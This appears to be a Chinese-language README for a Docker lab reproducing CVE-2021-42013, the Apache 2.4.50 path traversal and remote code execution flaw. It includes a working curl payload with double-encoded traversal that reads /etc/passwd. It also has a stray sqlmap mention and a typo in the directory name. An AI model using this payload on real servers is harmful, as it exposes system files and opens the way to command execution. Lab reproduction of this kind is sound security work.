本项目旨在使用 Docker 容器化特定漏洞。其目标是创建一个隔离环境,在此环境中可以安全地利用和测试该漏洞。
Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal
要运行此项目,您的机器上必须安装:
安装好前置依赖后,您可以克隆此 Git 仓库到您的机器上:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
进入该目录后,运行以下命令来搭建易受攻击的环境:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
然后通过地址 http://localhost:8000 访问该应用程序。 如果一切正常,您应该会看到显示 "It works"。
下面使用 curl 执行此 payload 表明目标存在漏洞。该脚本将生成适当的 sqlmap 命令来利用此漏洞。
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
此 payload 可在未经用户同意的情况下直接访问系统中与用户相关的信息。
一旦我们在服务器上启用 cgi 或 cgid 模块,此漏洞将允许攻击者执行任意命令。